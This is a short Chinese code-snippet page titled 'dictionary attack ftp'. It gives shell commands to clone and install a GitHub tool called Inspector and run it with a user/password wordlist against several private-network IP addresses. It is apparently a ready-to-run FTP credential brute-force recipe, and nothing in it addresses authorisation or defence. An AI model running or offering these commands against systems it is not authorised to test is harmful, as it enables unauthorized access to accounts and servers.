📜  字典攻击 ftp - 任何代码示例

📅  最后修改于: 2022-03-11 15:00:08.286000             🧑  作者: Mango

代码示例1
git clone https://github.com/intrackeable/Inspector.git
cd Inspector
pip install -r requirements.txt
python3 Inspector.py -h


Examples:
python3 Inspector.py -F USER_PASS -T 5 -S 192.168.0.177
python3 Inspector.py -F USER_PASS -T 8 -S 192.168.0.181 192.168.0.182